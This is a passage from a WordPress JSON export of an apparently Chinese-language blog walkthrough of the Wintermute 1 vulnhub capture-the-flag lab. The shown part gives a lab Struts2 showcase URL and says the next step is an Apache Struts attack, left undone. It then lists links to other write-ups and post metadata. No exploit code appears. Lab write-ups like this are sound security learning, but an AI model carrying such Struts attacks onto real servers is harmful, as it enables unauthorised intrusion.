class=\"language-text\">http:\/\/192.168.56.110:8080\/struts2_2.3.15.1-showcase\/showcase.action<\/code><\/pre>\n<p>\u7136\u540e\u5229\u7528Apache struts\u6f0f\u6d1e\u8fdb\u884c\u653b\u51fb\u3002\u4f3c\u4e4e\u8fd8\u6709\u5f88\u591a\u7684\u4e1c\u897f\u8981\u505a\uff0c\u9ebb\u4e86\uff0c\u5148\u6401\u7f6e\u5427\uff0c\u4ee5\u540e\u6709\u673a\u4f1a\u518d\u5c1d\u8bd5\uff01<\/p>\n<h1>\u53c2\u8003blog<\/h1>\n<p><a href=\"https:\/\/www.hackingarticles.in\/hack-the-wintermute-1-ctf-challenge\/\">https:\/\/www.hackingarticles.in\/hack-the-wintermute-1-ctf-challenge\/<\/a><\/p>\n<p><a href=\"https:\/\/seekorswim.github.io\/walkthroughs\/2019\/05\/01\/wintermute-1\/\">https:\/\/seekorswim.github.io\/walkthroughs\/2019\/05\/01\/wintermute-1\/<\/a>  <\/p>\n<p><a href=\"https:\/\/www.cnblogs.com\/jarwu\/p\/17411962.html\">https:\/\/www.cnblogs.com\/jarwu\/p\/17411962.html<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/qq_34801745\/article\/details\/103987311\">https:\/\/blog.csdn.net\/qq_34801745\/article\/details\/103987311<\/a><\/p>\n<p><a href=\"https:\/\/fdlucifer.github.io\/2020\/01\/13\/WinterMute-1\/\">https:\/\/fdlucifer.github.io\/2020\/01\/13\/WinterMute-1\/<\/a><\/p>\n<p><a href=\"https:\/\/www.freebuf.com\/articles\/web\/259582.html\">https:\/\/www.freebuf.com\/articles\/web\/259582.html<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/G20171130\/article\/details\/118805915\">https:\/\/blog.csdn.net\/G20171130\/article\/details\/118805915<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/mzfr\/vulnhub-writeups\/blob\/master\/2019-07-26-wintermute.md\">https:\/\/github.com\/mzfr\/vulnhub-writeups\/blob\/master\/2019-07-26-wintermute.md<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WINTERMUTE1 \u914d\u7f6e\u9776\u573a \u6253\u5f00\u770b\u4e00\u4e0b\uff0c\u6709\u4e2a\u5b89\u88c5\u5411\u5bfc\uff1a Wintermute Vitrual Box S [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-391","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=391"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/391\/revisions"}],"predecessor-version":[{"id":393,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/391\/revisions\/393"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=391"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}